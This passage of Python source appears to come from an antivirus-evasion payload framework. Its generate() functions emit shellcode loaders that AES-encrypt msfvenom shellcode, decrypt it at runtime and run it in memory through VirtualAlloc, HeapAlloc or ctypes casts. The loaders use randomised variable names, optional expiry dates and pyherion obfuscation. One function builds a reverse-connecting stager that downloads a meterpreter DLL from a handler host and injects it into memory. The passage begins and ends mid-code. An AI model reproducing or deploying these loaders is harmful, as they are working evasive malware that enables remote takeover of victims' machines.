RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "from ctypes import *\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += RandPadding + " = '{'\n" PayloadCode += ( RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += ( RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" ) PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += RandShellcode + "()" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "from ctypes import *\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandPadding + " = '{'\n" PayloadCode += ( "\t" + RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( "\t" + RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += ( "\t" + ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n' ) PayloadCode += ( "\t" + RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" ) PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += "\t" + RandShellcode + "()" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): self._validateArchitecture() # randomize all of the variable names used shellCodeName = helpers.randomString() socketName = helpers.randomString() intervalName = helpers.randomString() attemptsName = helpers.randomString() getDataMethodName = helpers.randomString() fdBufName = helpers.randomString() rcvStringName = helpers.randomString() rcvCStringName = helpers.randomString() injectMethodName = helpers.randomString() tempShellcodeName = helpers.randomString() shellcodeBufName = helpers.randomString() fpName = helpers.randomString() tempCBuffer = helpers.randomString() payloadCode = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payloadCode += "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payloadCode += "def %s():\n" %(getDataMethodName) payloadCode += "\ttry:\n" payloadCode += "\t\tglobal %s\n" %(socketName) # build the socket and connect to the handler payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName) payloadCode += "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName) # unpack the length of the payload, received as a 4 byte array from the handler payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" %(socketName) payloadCode += "\t\t%s = \" \"\n" % (rcvStringName) # receive ALL of the payload .dll data payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName) payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payloadCode += "\t\treturn %s\n" % (rcvCStringName) payloadCode += "\texcept: return None\n" # build the method that injects the .dll into memory payloadCode += "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payloadCode += "\tif %s != None:\n" %(tempShellcodeName) payloadCode += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName) # copy the .dll into the allocated memory payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName) # kick the thread off to execute the .dll payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName) # wait for the .dll execution to finish payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # set up expiration options if specified if self.required_options["expire_payload"][0].lower() == "x": # download the stager payloadCode += "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payloadCode += "%s(%s)\n" % (injectMethodName,shellCodeName) else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) randToday = helpers.randomString() randExpire = helpers.randomString() payloadCode += 'from datetime import datetime\n' payloadCode += 'from datetime import date\n\n' payloadCode += randToday + ' = datetime.now()\n' payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n' # download the stager payloadCode += "\t%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payloadCode += "\t%s(%s)\n" % (injectMethodName,shellCodeName) if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() HeapVar = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += 